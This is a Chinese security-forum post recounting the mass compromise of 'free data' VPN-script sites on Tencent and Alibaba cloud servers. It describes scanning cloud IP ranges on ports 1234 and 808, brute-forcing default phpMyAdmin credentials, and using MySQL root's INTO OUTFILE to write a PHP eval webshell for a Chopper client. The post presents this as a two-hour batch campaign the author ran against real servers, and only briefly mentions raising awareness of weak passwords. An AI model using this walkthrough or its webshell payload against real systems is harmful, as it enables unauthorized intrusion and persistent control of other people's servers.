0
回答
批量入侵免流网站(多为阿里云腾讯云等服务器)
利用AWS快速构建适用于生产的无服务器应用程序,免费试用12个月>>>   

本文原创作者:神裤衩,本文属i春秋原创奖励计划,未经许可禁止转载!

上一篇文章说篇幅太少,其实操作就那样,没必要一步一步的说明,有的朋友给我发邮件私聊了下,很简单就复现了。

       接下来正文,之前发现某些免流脚本,都是默认密码,数据库管理都是phpmyadmin,lnmp自动安装的,有些选项都没有让用户自己填写,导致了批量shell。简介就是这样。坛子里好像是有过入侵的,不过是通过burp爆破phpmyadmin。通用了一下,大家就明白了吧。

       首先我了解到免流的web服务通常使用1234端口和808端口,那么开始找腾讯云的ip段进行扫描。详细入侵流程https://bbs.ichunqiu.com/thread-19121-1-1.html

扫描后复制下来保存到记事本中,批量处理下后缀名。

保存ip之后导入,设置用户名,密码字典等。

开始爆破。

爆破之后导出ip和密码

之前有过某个做黑产的牛发的扫过的。

逐条打开测试

登陆phpmyadmin

点击sql,既然是mysql的root权限,那就可以通过找到绝对路径后写shell,

而脚本安装都是统一的目录,而且安装的是lnmp环境。So

      select '<?php @eval($_POST[1111])?>'into outfile '/home/wwwroot/default/admin/index1.php'

 

一句话写入,这样的话可以用菜刀连接了

 

这是之前搞得12月份的批量,基本两个小时。

有什么不明白的可以在楼下回复,有什么不明白的或者有兴趣进行技术上的讨论[email]954623886@qq.com[/email]也可以联系我的邮箱。

欢迎各位大佬骚扰。

总体来说,爆破时最没技术手段的方式,但是也是能造成危害比较大的一个方式。简单把这个事情说说,希望能引起大舰队弱口令和对服务器配置等的关注。

<无标签>
举报
i春秋学院
发帖于7个月前 0回/308阅
顶部